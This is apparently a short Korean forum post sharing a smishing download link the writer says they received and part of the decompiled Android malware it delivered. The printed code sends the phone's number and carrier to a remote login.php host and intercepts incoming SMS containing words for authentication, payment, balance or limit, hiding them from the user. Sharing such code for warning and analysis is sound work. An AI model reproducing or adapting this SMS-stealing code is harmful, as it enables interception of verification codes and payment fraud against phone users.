2373
2013-08-28 00:17:36
3
http://126.12.126.97/44c2421582.apk
이건 제가 실제로 받은 문자의 url이고 지금은 막혀있습니다.
아래는 아는 지인에게 의뢰한 어플리케이션 코드의 일부입니다.
SMS.usehost = "http://119.242.15.82/login.php";
SMS.conusehost = "http://119.242.15.82/login.php";
SMS.ponNum = localTelephonyManager.getLine1Number();
SMS.towNum = localTelephonyManager.getNetworkOperatorName();
SMS.comment = "문자내용";
...
if (str2.indexOf("인증") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("결제") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("보호") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("휴대폰") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("번호") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("잔여") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("잔액") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("구매") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("한도") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}
if (str2.indexOf("www") >= 0)
{
towNum = str1;
comten = str2;
D = true;
abortBroadcast();
}